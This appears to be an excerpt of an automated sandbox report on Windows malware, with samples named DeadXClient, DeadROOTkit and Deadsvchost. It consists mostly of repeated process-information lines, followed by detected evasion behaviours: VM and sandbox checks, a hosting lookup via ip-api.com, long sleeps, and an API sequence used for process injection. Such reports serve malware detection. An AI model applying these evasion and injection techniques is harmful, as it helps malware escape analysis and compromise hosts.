Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 6_2_0000000140001854
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr Binary or memory string: SBIEDLL.DLLINFO
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: A20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: 1A780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Memory allocated: EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Memory allocated: 1A900000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Memory allocated: 8D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Memory allocated: 1A310000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 10C0000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1AD40000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1A4A0000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 10A0000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1AE80000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599640 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599293 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599133 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598741 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598568 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598440 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\DeadXClient.exe Window / User API: threadDelayed 6514 Jump to behavior
Source: C:\Users\Public\DeadXClient.exe Window / User API: threadDelayed 3143 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Window / User API: threadDelayed 3804 Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Window / User API: threadDelayed 5987 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3822 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5329 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1186
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 8849
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 1151
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9914
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9863
